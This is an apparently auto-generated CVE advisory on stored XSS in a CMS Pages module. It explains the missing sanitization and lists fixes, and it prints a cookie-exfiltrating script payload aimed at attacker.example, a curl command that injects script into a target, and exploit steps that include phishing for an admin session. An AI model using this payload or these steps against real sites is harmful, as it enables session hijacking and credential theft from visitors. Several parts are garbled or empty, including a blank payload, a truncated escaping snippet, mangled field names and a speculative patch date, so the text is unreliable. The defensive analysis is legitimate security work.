Pages Module, Stored XSS (Critical)

Listen to this Post

How the mentioned CVE works: The Pages module fails to apply the html_purify validation rule to content fields during create and update operations, unlike the Blog module which correctly sanitizes. An authenticated admin with page-editing privileges can inject arbitrary JavaScript into page content. The unsanitized input is stored directly in the database via modules/Pages/Controllers/Pages.php lines 111 and 157. On the public frontend, app/Views/templates/default/pages.php line 32 renders the content as raw HTML using `echo $pageInfo->content` without escaping. The html_purify rule defined in modules/Backend/Validation/CustomRules.php uses HTMLPurifier to strip dangerous tags, but its absence allows script tags and event handlers. An attacker creates a page with a payload like <script>document.location="https://attacker.example/?c="+document.cookie</script>. Any unauthenticated visitor viewing that page triggers the script, sending cookies to the attacker. The attack requires admin session (PR:H) but affects all public visitors (S:C). Lower-privileged admins can compromise higher-privileged admin sessions.

dailycve form:

Platform: Unknown CMS
Version: Not specified
Vulnerability: Stored XSS
Severity: Critical
date: 2026-04-09

Prediction: Patch expected 2026-04-16

Analytics under What Undercode Say:

Identify vulnerable endpoints
curl -s https://target/backend/pages/create -b "ci_session=ADMIN_SESSION" -X POST -d "lang[bash][content]=<script>alert(1)</script>" | grep -i "error"
Check if html_purify missing in validation
grep -A2 "lang..content" modules/Pages/Controllers/Pages.php | grep -v html_purify
Simulate attack impact on visitor logs
tail -f /var/log/nginx/access.log | grep "attacker.example"

how Exploit:

  1. Obtain admin session cookie via phishing or compromised account.
  2. Send POST to `/backend/pages/create` with payload: `lang[bash][content]=`

3. Publish page and share public URL.

  1. Victim visits page, script exfiltrates cookies to attacker server.

Protection from this CVE:

  • Add `|html_purify` to validation rules in Pages controller (lines 82 and 130).
  • Escape output in view: `content, ‘raw’) ?>` after purification.
  • Apply Content Security Policy (CSP) to block inline scripts.
  • Limit admin page-editing privileges to trusted users only.

Impact:

  • Session hijacking of any visitor including other admins.
  • Credential theft via fake login forms or keyloggers.
  • Site defacement and malware distribution to all public viewers.
  • Complete compromise of multi-admin CMS environment from low-privileged admin.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top